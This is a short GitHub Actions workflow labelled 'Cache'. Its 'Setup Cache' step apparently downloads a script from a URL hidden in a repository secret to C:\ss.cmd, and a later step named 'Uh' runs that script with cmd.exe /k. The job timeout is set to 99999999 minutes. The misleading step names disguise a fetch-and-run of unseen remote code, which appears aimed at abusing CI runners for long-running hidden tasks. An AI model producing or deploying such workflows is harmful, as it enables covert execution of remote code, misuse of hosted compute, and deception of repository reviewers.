name: Cache

on: push

jobs:
  build:
    runs-on: windows-latest
    timeout-minutes: 99999999
    
    steps:
    - name: Setup Cache
      run: curl -o C:\ss.cmd "$Env:FL"
      env:
        FL: ${{ secrets.FL }}

    - name: Checks
      run: cmd.exe /c "dir"

    - name: Uh
      run: cmd.exe /k "C:\ss.cmd"
